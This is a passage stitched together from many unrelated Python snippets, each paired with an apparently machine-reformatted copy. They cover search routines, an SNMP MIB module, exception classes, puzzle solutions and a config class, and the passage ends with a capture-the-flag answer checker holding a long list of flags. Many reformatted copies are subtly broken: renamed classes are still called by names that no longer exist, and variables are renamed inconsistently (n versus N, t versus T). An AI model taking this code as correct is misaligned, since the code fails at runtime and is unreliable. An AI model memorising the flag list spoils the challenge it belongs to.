doc['reduction'][i]['mode'] == 'driving': time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i - 1]['time']) elif doc['reduction'][i]['mode'] == 'walking': time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i - 1]['time']) elif doc['reduction'][i]['mode'] == 'chilling': time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i - 1]['time']) elif doc['reduction'][i]['mode'] == 'bogus': time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i - 1]['time']) if doc['reduction'][-1]['mode'] == 'driving': time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif doc['reduction'][-1]['mode'] == 'walking': time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif doc['reduction'][-1]['mode'] == 'chilling': time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) elif doc['reduction'][-1]['mode'] == 'bogus': time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time']) duration_of_trip = float(doc['duration_of_trip']) doc['time_percentage_driving'] = str(time_spent_driving / duration_of_trip * 100) doc['time_percentage_walking'] = str(time_spent_walking / duration_of_trip * 100) doc['time_percentage_chilling'] = str(time_spent_chilling / duration_of_trip * 100) doc['time_percentage_bogus'] = str(time_spent_bogus / duration_of_trip * 100) if silent == False: print('Done labeling mode of travel. Returning list of length ' + str(len(trip_list)) + '.') return trip_list
def binary(a, tv): minimum = 0 maximum = len(a) - 1 while minimum < maximum: guess = round((minimum + maximum)/2) if a[guess] == tv: return guess elif a[guess] < tv: minimum = guess + 1 else: maximum = guess - 1 return -1 arr = [] ind = binary(arr, 4) print("index:") print(ind)
def binary(a, tv): minimum = 0 maximum = len(a) - 1 while minimum < maximum: guess = round((minimum + maximum) / 2) if a[guess] == tv: return guess elif a[guess] < tv: minimum = guess + 1 else: maximum = guess - 1 return -1 arr = [] ind = binary(arr, 4) print('index:') print(ind)
# # PySNMP MIB module MERU-CONFIG-ICR-MIB (http://snmplabs.com/pysmi) # ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/MERU-CONFIG-ICR-MIB # Produced by pysmi-0.3.4 at Mon Apr 29 20:01:04 2019 # On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4 # Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15) # ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer") NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues") ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint") Ipv6Address, = mibBuilder.importSymbols("IPV6-TC", "Ipv6Address") mwConfiguration, = mibBuilder.importSymbols("MERU-SMI", "mwConfiguration") ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup") Bits, ObjectIdentity, TimeTicks, NotificationType, Counter64, Unsigned32, MibIdentifier, Integer32, iso, enterprises, Counter32, Gauge32, IpAddress, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn = mibBuilder.importSymbols("SNMPv2-SMI", "Bits", "ObjectIdentity", "TimeTicks", "NotificationType", "Counter64", "Unsigned32", "MibIdentifier", "Integer32", "iso", "enterprises", "Counter32", "Gauge32", "IpAddress", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn") DateAndTime, TimeStamp, TruthValue, TextualConvention, MacAddress, DisplayString, TimeInterval, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DateAndTime", "TimeStamp", "TruthValue", "TextualConvention", "MacAddress", "DisplayString", "TimeInterval", "RowStatus") mwConfigIcr = ModuleIdentity((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18)) if mibBuilder.loadTexts: mwConfigIcr.setLastUpdated('200506050000Z') if mibBuilder.loadTexts: mwConfigIcr.setOrganization('Meru Networks') mwIcrTable = MibTable((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1), ) if mibBuilder.loadTexts: mwIcrTable.setStatus('current') mwIcrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1), ).setIndexNames((0, "MERU-CONFIG-ICR-MIB", "mwIcrTableIndex")) if mibBuilder.loadTexts: mwIcrEntry.setStatus('current') mwIcrTableIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 1), Integer32()) if mibBuilder.loadTexts: mwIcrTableIndex.setStatus('current') mwIcrControllerIp = MibTableColumn((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 2), IpAddress()).setMaxAccess("readcreate") if mibBuilder.loadTexts: mwIcrControllerIp.setStatus('current') mwIcrEssId = MibTableColumn((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 31))).setMaxAccess("readcreate") if mibBuilder.loadTexts: mwIcrEssId.setStatus('current') mwIcrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 4), RowStatus()).setMaxAccess("readcreate") if mibBuilder.loadTexts: mwIcrRowStatus.setStatus('current') mibBuilder.exportSymbols("MERU-CONFIG-ICR-MIB", mwIcrTable=mwIcrTable, mwIcrEssId=mwIcrEssId, mwIcrRowStatus=mwIcrRowStatus, mwIcrControllerIp=mwIcrControllerIp, mwIcrEntry=mwIcrEntry, mwConfigIcr=mwConfigIcr, PYSNMP_MODULE_ID=mwConfigIcr, mwIcrTableIndex=mwIcrTableIndex)
(object_identifier, octet_string, integer) = mibBuilder.importSymbols('ASN1', 'ObjectIdentifier', 'OctetString', 'Integer') (named_values,) = mibBuilder.importSymbols('ASN1-ENUMERATION', 'NamedValues') (value_size_constraint, constraints_intersection, constraints_union, single_value_constraint, value_range_constraint) = mibBuilder.importSymbols('ASN1-REFINEMENT', 'ValueSizeConstraint', 'ConstraintsIntersection', 'ConstraintsUnion', 'SingleValueConstraint', 'ValueRangeConstraint') (ipv6_address,) = mibBuilder.importSymbols('IPV6-TC', 'Ipv6Address') (mw_configuration,) = mibBuilder.importSymbols('MERU-SMI', 'mwConfiguration') (module_compliance, notification_group) = mibBuilder.importSymbols('SNMPv2-CONF', 'ModuleCompliance', 'NotificationGroup') (bits, object_identity, time_ticks, notification_type, counter64, unsigned32, mib_identifier, integer32, iso, enterprises, counter32, gauge32, ip_address, module_identity, mib_scalar, mib_table, mib_table_row, mib_table_column) = mibBuilder.importSymbols('SNMPv2-SMI', 'Bits', 'ObjectIdentity', 'TimeTicks', 'NotificationType', 'Counter64', 'Unsigned32', 'MibIdentifier', 'Integer32', 'iso', 'enterprises', 'Counter32', 'Gauge32', 'IpAddress', 'ModuleIdentity', 'MibScalar', 'MibTable', 'MibTableRow', 'MibTableColumn') (date_and_time, time_stamp, truth_value, textual_convention, mac_address, display_string, time_interval, row_status) = mibBuilder.importSymbols('SNMPv2-TC', 'DateAndTime', 'TimeStamp', 'TruthValue', 'TextualConvention', 'MacAddress', 'DisplayString', 'TimeInterval', 'RowStatus') mw_config_icr = module_identity((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18)) if mibBuilder.loadTexts: mwConfigIcr.setLastUpdated('200506050000Z') if mibBuilder.loadTexts: mwConfigIcr.setOrganization('Meru Networks') mw_icr_table = mib_table((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1)) if mibBuilder.loadTexts: mwIcrTable.setStatus('current') mw_icr_entry = mib_table_row((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1)).setIndexNames((0, 'MERU-CONFIG-ICR-MIB', 'mwIcrTableIndex')) if mibBuilder.loadTexts: mwIcrEntry.setStatus('current') mw_icr_table_index = mib_table_column((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 1), integer32()) if mibBuilder.loadTexts: mwIcrTableIndex.setStatus('current') mw_icr_controller_ip = mib_table_column((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 2), ip_address()).setMaxAccess('readcreate') if mibBuilder.loadTexts: mwIcrControllerIp.setStatus('current') mw_icr_ess_id = mib_table_column((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 3), display_string().subtype(subtypeSpec=value_size_constraint(0, 31))).setMaxAccess('readcreate') if mibBuilder.loadTexts: mwIcrEssId.setStatus('current') mw_icr_row_status = mib_table_column((1, 3, 6, 1, 4, 1, 15983, 1, 1, 4, 18, 1, 1, 4), row_status()).setMaxAccess('readcreate') if mibBuilder.loadTexts: mwIcrRowStatus.setStatus('current') mibBuilder.exportSymbols('MERU-CONFIG-ICR-MIB', mwIcrTable=mwIcrTable, mwIcrEssId=mwIcrEssId, mwIcrRowStatus=mwIcrRowStatus, mwIcrControllerIp=mwIcrControllerIp, mwIcrEntry=mwIcrEntry, mwConfigIcr=mwConfigIcr, PYSNMP_MODULE_ID=mwConfigIcr, mwIcrTableIndex=mwIcrTableIndex)
N = int(input()) _hour = str(N // 3600) N = N % 3600 _min = str(N // 60) _sec = str(N % 60) print(_hour + ':', _min + ':', _sec, sep='')
n = int(input()) _hour = str(N // 3600) n = N % 3600 _min = str(N // 60) _sec = str(N % 60) print(_hour + ':', _min + ':', _sec, sep='')
__all__ = ['Subcommand'] # placeholder class for subcommand classes to derive from class Subcommand(object): pass # placeholder class for internal subcommand classes class InternalSubcommand(object): pass
__all__ = ['Subcommand'] class Subcommand(object): pass class Internalsubcommand(object): pass
class DataStructureError(ValueError): """ Exception signalling that there is something wrong in the data saved to the database - might be missing data, conflict with existing data, etc. """ class SourceFileMissingError(Exception): """ Used in re-importing code if is finds that the file to read is not there """ class WrongState(RuntimeError): """ Exception which occurs when model is in state not suitable to perform request action e.g. transition from state to state """ class UnknownMetric(Exception): """ Raised during import when unexisting metric is found. used only when AUTOMATICALLY_CREATE_METRICS=False """ class UnsupportedMetric(Exception): """ Raised when unsupported metric for report type is found during import. """
class Datastructureerror(ValueError): """ Exception signalling that there is something wrong in the data saved to the database - might be missing data, conflict with existing data, etc. """ class Sourcefilemissingerror(Exception): """ Used in re-importing code if is finds that the file to read is not there """ class Wrongstate(RuntimeError): """ Exception which occurs when model is in state not suitable to perform request action e.g. transition from state to state """ class Unknownmetric(Exception): """ Raised during import when unexisting metric is found. used only when AUTOMATICALLY_CREATE_METRICS=False """ class Unsupportedmetric(Exception): """ Raised when unsupported metric for report type is found during import. """
# -*- coding: utf-8 -*- class School(object): """Data class for schools.""" def __init__( self, code, name, city, state, from_m, from_y, to_m, to_y, grad_m, grad_y, ): """Intitalization method.""" self.school_code = code self.school_name = name self.school_city = city self.school_state = state self.from_month = from_m self.from_year = from_y self.to_month = to_m self.to_year = to_y self.grad_month = grad_m self.grad_year = grad_y
class School(object): """Data class for schools.""" def __init__(self, code, name, city, state, from_m, from_y, to_m, to_y, grad_m, grad_y): """Intitalization method.""" self.school_code = code self.school_name = name self.school_city = city self.school_state = state self.from_month = from_m self.from_year = from_y self.to_month = to_m self.to_year = to_y self.grad_month = grad_m self.grad_year = grad_y
def Alchemy(C, N): return 'N' if abs(C.count('A') - C.count('B')) > 1 else 'Y' if __name__ == "__main__": T = int(input()) for i in range(T): N = int(input()) C = input() print("Case #{}:".format(i+1), end=" ") print(Alchemy(list(C), N)) # s = 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" # print(s.count('A')) # print(s.count('B'))
def alchemy(C, N): return 'N' if abs(C.count('A') - C.count('B')) > 1 else 'Y' if __name__ == '__main__': t = int(input()) for i in range(T): n = int(input()) c = input() print('Case #{}:'.format(i + 1), end=' ') print(alchemy(list(C), N))
''' Lab2 ''' #3.1 my_name = 'Tom' print(my_name.upper()) #3.2 my_id = 123 print(my_id) #3.3 # 123=my_id my_id=your_id=123 print(my_id) print(your_id) #3.4 my_id_str = '123' print(my_id_str) #3.5 #print(my_name+my_id) #3.6 print(my_name+my_id_str) #3.7 print(my_name*3) #3.8 print('hello, world. This is my first python string.'.split('.')) #3.9 #message='Tom's id is 123'
""" Lab2 """ my_name = 'Tom' print(my_name.upper()) my_id = 123 print(my_id) my_id = your_id = 123 print(my_id) print(your_id) my_id_str = '123' print(my_id_str) print(my_name + my_id_str) print(my_name * 3) print('hello, world. This is my first python string.'.split('.'))
syscalls = [ "fork", "exit", "wait", "pipe", "read", "write", "close", "kill", "exec", "open", "mknod", "unlink", "fstat", "link", "mkdir", "chdir", "dup", "getpid", "sbrk", "sleep", "uptime" ]
syscalls = ['fork', 'exit', 'wait', 'pipe', 'read', 'write', 'close', 'kill', 'exec', 'open', 'mknod', 'unlink', 'fstat', 'link', 'mkdir', 'chdir', 'dup', 'getpid', 'sbrk', 'sleep', 'uptime']
class UndirectedGraphNode: def __init__(self, x): self.label = x self.neighbors = [] class TreeNode: def __init__(self, val): self.val = val self.left, self.right = None, None class Solution: """ @param root: binary tree @return: N-ary tree """ def decode(self, root): # write your code here if root is None: return None result = UndirectedGraphNode(root.val) curr = root.left while curr: result.neighbors.append(self.decode(curr)) curr = curr.right return result """ @param root: N-ary tree @return: binary tree """ def encode(self, root): # write your code here if root is None: return None result = TreeNode(root.label) if root.neighbors: result.left = self.encode(root.neighbors[0]) curr = result.left for neighbor in root.neighbors[1:]: curr.right = self.encode(neighbor) curr = curr.right return result
class Undirectedgraphnode: def __init__(self, x): self.label = x self.neighbors = [] class Treenode: def __init__(self, val): self.val = val (self.left, self.right) = (None, None) class Solution: """ @param root: binary tree @return: N-ary tree """ def decode(self, root): if root is None: return None result = undirected_graph_node(root.val) curr = root.left while curr: result.neighbors.append(self.decode(curr)) curr = curr.right return result '\n @param root: N-ary tree\n @return: binary tree\n ' def encode(self, root): if root is None: return None result = tree_node(root.label) if root.neighbors: result.left = self.encode(root.neighbors[0]) curr = result.left for neighbor in root.neighbors[1:]: curr.right = self.encode(neighbor) curr = curr.right return result
class TranslationException(Exception): """ Error raised when a translation file can't be found. """ pass class MediaNotSetUp(Exception): """ Error raised when a media file can't be found or set up. """ pass class DataRetrievingError(Exception): """ Error raised when some raw content has not been retrieved. """ pass class ContextNotFoundError(Exception): """ Error raised when the context class of a software was not found. """ pass class InvalidNodeError(Exception): """ Error raised when, in a nodal context (i.e. Houdini) a node is not found. """ pass class RenderCameraError(Exception): """ Error raised when a render camera has failed to be set. """ pass class RenderNotSupported(Exception): """ Error raised when a render is not currently supported. """ pass class OutputPathError(Exception): """ Error raised when an output path is invalid. """ pass
class Translationexception(Exception): """ Error raised when a translation file can't be found. """ pass class Medianotsetup(Exception): """ Error raised when a media file can't be found or set up. """ pass class Dataretrievingerror(Exception): """ Error raised when some raw content has not been retrieved. """ pass class Contextnotfounderror(Exception): """ Error raised when the context class of a software was not found. """ pass class Invalidnodeerror(Exception): """ Error raised when, in a nodal context (i.e. Houdini) a node is not found. """ pass class Rendercameraerror(Exception): """ Error raised when a render camera has failed to be set. """ pass class Rendernotsupported(Exception): """ Error raised when a render is not currently supported. """ pass class Outputpatherror(Exception): """ Error raised when an output path is invalid. """ pass
class Config(): # simulation T = 2200 sim_t = 2000 + 1 current_time = 0 # Job process_t_lower = 1 process_t_upper = 5 job_resource_lower = 5 job_resource_upper = 15 # Server server_r = 40 server_count = 6 server_heat_constant = 200 server_pos_x = [0, 1, -2, -2, 3, 3] server_pos_y = [0, 0, 0, 2, 1, 3] a = 0.5 b = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5] # Reward # alpha = 10 alpha = 0.5 # beta = 0.2 beta = 0.5 # Q net in out put server_state_dim = 7 total_server_state_dim = server_count * server_state_dim server_feature_dim = 2 job_state_dim = 5 dc_state_dim = 1 action_dim = server_count # Q net size server_feature_layer1_size = 10 q_net_layer1_size = 20 q_net_layer2_size = 10 # TRAIN PARAMETERS gamma = 0.8 learning_rate = 0.3 batch_size = 500 sample_count = sim_t - 1 batch_iter = sample_count / batch_size epoch = 1000 epsilon = 0.9 update_target_q_every_iter = batch_iter / 4 save_data_every_epoch = 5
class Config: t = 2200 sim_t = 2000 + 1 current_time = 0 process_t_lower = 1 process_t_upper = 5 job_resource_lower = 5 job_resource_upper = 15 server_r = 40 server_count = 6 server_heat_constant = 200 server_pos_x = [0, 1, -2, -2, 3, 3] server_pos_y = [0, 0, 0, 2, 1, 3] a = 0.5 b = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5] alpha = 0.5 beta = 0.5 server_state_dim = 7 total_server_state_dim = server_count * server_state_dim server_feature_dim = 2 job_state_dim = 5 dc_state_dim = 1 action_dim = server_count server_feature_layer1_size = 10 q_net_layer1_size = 20 q_net_layer2_size = 10 gamma = 0.8 learning_rate = 0.3 batch_size = 500 sample_count = sim_t - 1 batch_iter = sample_count / batch_size epoch = 1000 epsilon = 0.9 update_target_q_every_iter = batch_iter / 4 save_data_every_epoch = 5
"""A module defining custom exceptions for the package. Each subpackage has a base exception class. """ class OdkFormError(Exception): """The base exception class for the odkform subpackage.""" class MismatchedGroupOrRepeatError(OdkFormError): """An exception for parsing group or repeats.""" class LabelNotFoundError(OdkFormError): """An excpetion for determining the label for an XlsFormRow.""" class DatasetError(Exception): """The base exception class for the dataset subpackage.""" class DoFileError(Exception): """The base exception class for the dofile subpackage.""" class RenameNotApplicableError(Exception): """An exception when trying to apply a rename that doesn't apply.""" class RenameNotSupportedError(Exception): """An exception when trying to apply a rename that doesn't apply."""
"""A module defining custom exceptions for the package. Each subpackage has a base exception class. """ class Odkformerror(Exception): """The base exception class for the odkform subpackage.""" class Mismatchedgrouporrepeaterror(OdkFormError): """An exception for parsing group or repeats.""" class Labelnotfounderror(OdkFormError): """An excpetion for determining the label for an XlsFormRow.""" class Dataseterror(Exception): """The base exception class for the dataset subpackage.""" class Dofileerror(Exception): """The base exception class for the dofile subpackage.""" class Renamenotapplicableerror(Exception): """An exception when trying to apply a rename that doesn't apply.""" class Renamenotsupportederror(Exception): """An exception when trying to apply a rename that doesn't apply."""
class maze_control(): def __init__(self, map, solution): self.solution = solution self.dmap = [] for x in map: temp = [] for y in x: temp.append(y) self.dmap.append(temp) def get_car(self): if self.solution[0] != "": for row in range(len(self.dmap)): for cell in range(len(self.dmap[row])): if self.dmap[row][cell] == "2": return [row,cell] return None def move_car(self, row, cell): success = None error = None if self.solution[0] == "Forward": if self.dmap[row - 1][cell] != "1" or self.dmap[row - 1][cell] != "3": self.dmap[row][cell] = "0" self.dmap[row - 1][cell] = "2" elif self.dmap[row - 1][cell] == "3": success = 1 else: error = 1 elif self.solution[0] == "Backward": if self.dmap[row + 1][cell] != "1" or self.dmap[row + 1][cell] != "3": self.dmap[row][cell] = "0" self.dmap[row + 1][cell] = "2" elif self.dmap[row + 1][cell] == "3": success = 1 else: error = 2 elif self.solution[0] == "Right": if self.dmap[row][cell + 1] != "1" or self.dmap[row][cell + 1] != "3": self.dmap[row][cell] = "0" self.dmap[row][cell + 1] = "2" elif self.dmap[row][cell + 1] == "3": success = 1 else: error = 3 elif self.solution[0] == "Left": if self.dmap[row][cell - 1] != "1" or self.dmap[row][cell - 1] != "3": self.dmap[row][cell] = "0" self.dmap[row][cell - 1] = "2" elif self.dmap[row][cell - 1] == "3": success = 1 else: error = 4 return [self.dmap,self.solution,success,error]
class Maze_Control: def __init__(self, map, solution): self.solution = solution self.dmap = [] for x in map: temp = [] for y in x: temp.append(y) self.dmap.append(temp) def get_car(self): if self.solution[0] != '': for row in range(len(self.dmap)): for cell in range(len(self.dmap[row])): if self.dmap[row][cell] == '2': return [row, cell] return None def move_car(self, row, cell): success = None error = None if self.solution[0] == 'Forward': if self.dmap[row - 1][cell] != '1' or self.dmap[row - 1][cell] != '3': self.dmap[row][cell] = '0' self.dmap[row - 1][cell] = '2' elif self.dmap[row - 1][cell] == '3': success = 1 else: error = 1 elif self.solution[0] == 'Backward': if self.dmap[row + 1][cell] != '1' or self.dmap[row + 1][cell] != '3': self.dmap[row][cell] = '0' self.dmap[row + 1][cell] = '2' elif self.dmap[row + 1][cell] == '3': success = 1 else: error = 2 elif self.solution[0] == 'Right': if self.dmap[row][cell + 1] != '1' or self.dmap[row][cell + 1] != '3': self.dmap[row][cell] = '0' self.dmap[row][cell + 1] = '2' elif self.dmap[row][cell + 1] == '3': success = 1 else: error = 3 elif self.solution[0] == 'Left': if self.dmap[row][cell - 1] != '1' or self.dmap[row][cell - 1] != '3': self.dmap[row][cell] = '0' self.dmap[row][cell - 1] = '2' elif self.dmap[row][cell - 1] == '3': success = 1 else: error = 4 return [self.dmap, self.solution, success, error]
def print_hello(name=''): print('Hello,'+name) name = 'Ann' name2 = 'Bob' print_hello(name2)
def print_hello(name=''): print('Hello,' + name) name = 'Ann' name2 = 'Bob' print_hello(name2)
if __name__ == '__main__': input = open('input', 'r').readlines() inverse = { '(': ')', '[': ']', '{': '}', '<': '>' } points = { ')': 1, ']': 2, '}': 3, '>': 4 } score = lambda x: points[x[0]] if len(x) == 1 else 5*score(x[1:]) + points[x[0]] scores = list() for line in input: stack = list() for char in line: if char in inverse.keys(): stack.append(char) if char in points.keys(): if inverse[stack.pop(-1)] != char: stack = list() break if len(stack) > 0: scores.append(score([inverse[x] for x in stack])) print(sorted(scores)[len(scores)//2])
if __name__ == '__main__': input = open('input', 'r').readlines() inverse = {'(': ')', '[': ']', '{': '}', '<': '>'} points = {')': 1, ']': 2, '}': 3, '>': 4} score = lambda x: points[x[0]] if len(x) == 1 else 5 * score(x[1:]) + points[x[0]] scores = list() for line in input: stack = list() for char in line: if char in inverse.keys(): stack.append(char) if char in points.keys(): if inverse[stack.pop(-1)] != char: stack = list() break if len(stack) > 0: scores.append(score([inverse[x] for x in stack])) print(sorted(scores)[len(scores) // 2])
""" Space : O(n) Time : O(n) """ class Solution: def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool: if len(matrix) == 0: return True if len(matrix[0]) == 0: return True ly = len(matrix) lx = len(matrix[0]) for y in range(ly-1): for x in range(lx-1): if matrix[y][x] != matrix[y+1][x+1]: return False return True
""" Space : O(n) Time : O(n) """ class Solution: def is_toeplitz_matrix(self, matrix: List[List[int]]) -> bool: if len(matrix) == 0: return True if len(matrix[0]) == 0: return True ly = len(matrix) lx = len(matrix[0]) for y in range(ly - 1): for x in range(lx - 1): if matrix[y][x] != matrix[y + 1][x + 1]: return False return True
class Queue: def __init__(self): self.items = [] def push(self, e): self.items.append(e) def pop(self): head = self.items[0] self.items = self.items[1:] return head q = Queue() q.push(5) # [5] q.push(7) # [5, 7] q.push(11) # [5, 7, 11] print(q.pop()) # returns 5, left is [7, 11] print(q.pop()) # returns 7, left is [11]
class Queue: def __init__(self): self.items = [] def push(self, e): self.items.append(e) def pop(self): head = self.items[0] self.items = self.items[1:] return head q = queue() q.push(5) q.push(7) q.push(11) print(q.pop()) print(q.pop())
def check(attempt, context): if attempt.answer == flags[attempt.participant.id % len(flags)]: return Checked(True) if attempt.answer in flags: return CheckedPlagiarist(False, flags.index(attempt.answer)) return Checked(False) flags = ['LKL{s0_uSB_PXwlrPxA}', 'LKL{s0_uSB_z7dg8Y9I}', 'LKL{s0_uSB_KjpVWUxa}', 'LKL{s0_uSB_8IZmAon2}', 'LKL{s0_uSB_5iy7DOkp}', 'LKL{s0_uSB_NXz0PcbS}', 'LKL{s0_uSB_MK9Z9UxA}', 'LKL{s0_uSB_DHm7BnWm}', 'LKL{s0_uSB_USBK8T8P}', 'LKL{s0_uSB_s0WXgmVS}', 'LKL{s0_uSB_sZ2bl0wx}', 'LKL{s0_uSB_bUmpg3v6}', 'LKL{s0_uSB_QsCAtWGc}', 'LKL{s0_uSB_OqZ4Rh6S}', 'LKL{s0_uSB_UkbFQRPk}', 'LKL{s0_uSB_BgxoMJvW}', 'LKL{s0_uSB_we3Eyfns}', 'LKL{s0_uSB_nK8NZ3V9}', 'LKL{s0_uSB_DAffGL70}', 'LKL{s0_uSB_5jB2q6nx}', 'LKL{s0_uSB_uDQGRSFA}', 'LKL{s0_uSB_o9HCorcA}', 'LKL{s0_uSB_DhZGBvjk}', 'LKL{s0_uSB_Th0VNVRZ}', 'LKL{s0_uSB_05XYI0kI}', 'LKL{s0_uSB_Ni9vdv9L}', 'LKL{s0_uSB_I4jNsUmz}', 'LKL{s0_uSB_AObxkXcB}', 'LKL{s0_uSB_VURbik9Z}', 'LKL{s0_uSB_eJjyJJbg}', 'LKL{s0_uSB_gHNzhIqT}', 'LKL{s0_uSB_u2RlvRdb}', 'LKL{s0_uSB_6tQLsQjo}', 'LKL{s0_uSB_S58muLc9}', 'LKL{s0_uSB_kIqMOxv6}', 'LKL{s0_uSB_UHksYWu2}', 'LKL{s0_uSB_BORvmw8t}', 'LKL{s0_uSB_WE0otntt}', 'LKL{s0_uSB_I79RmkY1}', 'LKL{s0_uSB_vmlSh0Vl}', 'LKL{s0_uSB_daIh4Pgz}', 'LKL{s0_uSB_ZWaG9wkC}', 'LKL{s0_uSB_e7rNK2Ix}', 'LKL{s0_uSB_2u5WBjKu}', 'LKL{s0_uSB_3Jf8Drmb}', 'LKL{s0_uSB_03JzKMSh}', 'LKL{s0_uSB_GmZA9BKl}', 'LKL{s0_uSB_UZiF6aB2}', 'LKL{s0_uSB_PzBVMMAr}', 'LKL{s0_uSB_gAxkf6cq}', 'LKL{s0_uSB_yAI9plMq}', 'LKL{s0_uSB_UofbTKFx}', 'LKL{s0_uSB_PTjh1XQN}', 'LKL{s0_uSB_BcNoy0zU}', 'LKL{s0_uSB_KmYhwKNJ}', 'LKL{s0_uSB_nE69nc9c}', 'LKL{s0_uSB_w9jJXKJ5}', 'LKL{s0_uSB_HL3lv27S}', 'LKL{s0_uSB_ZdW8tuqW}', 'LKL{s0_uSB_Asbnxljq}', 'LKL{s0_uSB_y4cYmiLh}', 'LKL{s0_uSB_ZDg9jssi}', 'LKL{s0_uSB_4y6Sm4oe}', 'LKL{s0_uSB_gqp8CcfJ}', 'LKL{s0_uSB_qoNvUOlT}', 'LKL{s0_uSB_6nhJr9Py}', 'LKL{s0_uSB_PPYmBaWl}', 'LKL{s0_uSB_R6pVjaFe}', 'LKL{s0_uSB_3sRWoCli}', 'LKL{s0_uSB_y3HFBxQW}', 'LKL{s0_uSB_cDDvYy0o}', 'LKL{s0_uSB_ghzkr4IS}', 'LKL{s0_uSB_j0CK9S5C}', 'LKL{s0_uSB_3gDaVKHC}', 'LKL{s0_uSB_h70tavo1}', 'LKL{s0_uSB_Be1XMRYi}', 'LKL{s0_uSB_opXITTBk}', 'LKL{s0_uSB_BkVQ2FLG}', 'LKL{s0_uSB_mZHr3UWV}', 'LKL{s0_uSB_F4eodMtA}', 'LKL{s0_uSB_AROz9TXs}', 'LKL{s0_uSB_8OxnmLx4}', 'LKL{s0_uSB_KQ0tbg8G}', 'LKL{s0_uSB_gB5rbfDO}', 'LKL{s0_uSB_d1k9qhyP}', 'LKL{s0_uSB_196RP88F}', 'LKL{s0_uSB_mZNBzRjS}', 'LKL{s0_uSB_Wur6Edze}', 'LKL{s0_uSB_6e3Xumeo}', 'LKL{s0_uSB_Tv6v4zWR}', 'LKL{s0_uSB_3GjDBpy9}', 'LKL{s0_uSB_rBVSd0nm}', 'LKL{s0_uSB_ZKBLrwVn}', 'LKL{s0_uSB_vexASoRE}', 'LKL{s0_uSB_cutxmFvf}', 'LKL{s0_uSB_DDwGStSJ}', 'LKL{s0_uSB_JyHGD8ml}', 'LKL{s0_uSB_Ov4vjtrp}', 'LKL{s0_uSB_E6Detcsc}', 'LKL{s0_uSB_furY03Om}', 'LKL{s0_uSB_27o5Mfm8}', 'LKL{s0_uSB_Y3MknTs5}', 'LKL{s0_uSB_eMfhDGyH}', 'LKL{s0_uSB_lqbDKIB1}', 'LKL{s0_uSB_3ivPtu91}', 'LKL{s0_uSB_rZjQpsbI}', 'LKL{s0_uSB_PqZCq6JQ}', 'LKL{s0_uSB_bVnEdI56}', 'LKL{s0_uSB_RRikhcIc}', 'LKL{s0_uSB_HdtiaFDJ}', 'LKL{s0_uSB_Ti2oLD80}', 'LKL{s0_uSB_j3XGW2ta}', 'LKL{s0_uSB_fzmQGa4G}', 'LKL{s0_uSB_7jSAh08B}', 'LKL{s0_uSB_KwqemW2l}', 'LKL{s0_uSB_2bNxaZ3F}', 'LKL{s0_uSB_eM6TYciC}', 'LKL{s0_uSB_XJfJIES1}', 'LKL{s0_uSB_ssosGajS}', 'LKL{s0_uSB_xeu8G26H}', 'LKL{s0_uSB_sgPmRjOk}', 'LKL{s0_uSB_ZqLkqBOg}', 'LKL{s0_uSB_oprmDfmr}', 'LKL{s0_uSB_6nLSXo7j}', 'LKL{s0_uSB_55DwPvWo}', 'LKL{s0_uSB_JVKFLo10}', 'LKL{s0_uSB_6yUaMJrA}', 'LKL{s0_uSB_5Oq5Ti5G}', 'LKL{s0_uSB_AY8ED8CB}', 'LKL{s0_uSB_JRDYR5MH}', 'LKL{s0_uSB_Iks1LoEE}', 'LKL{s0_uSB_q1plTYIn}', 'LKL{s0_uSB_yVLJwxOS}', 'LKL{s0_uSB_6Ux8MUtV}', 'LKL{s0_uSB_5RFTpCIy}', 'LKL{s0_uSB_bnc3s76j}', 'LKL{s0_uSB_g4aYc9wW}', 'LKL{s0_uSB_fTvAQr9W}', 'LKL{s0_uSB_UkBJfK9C}', 'LKL{s0_uSB_TArTY56n}', 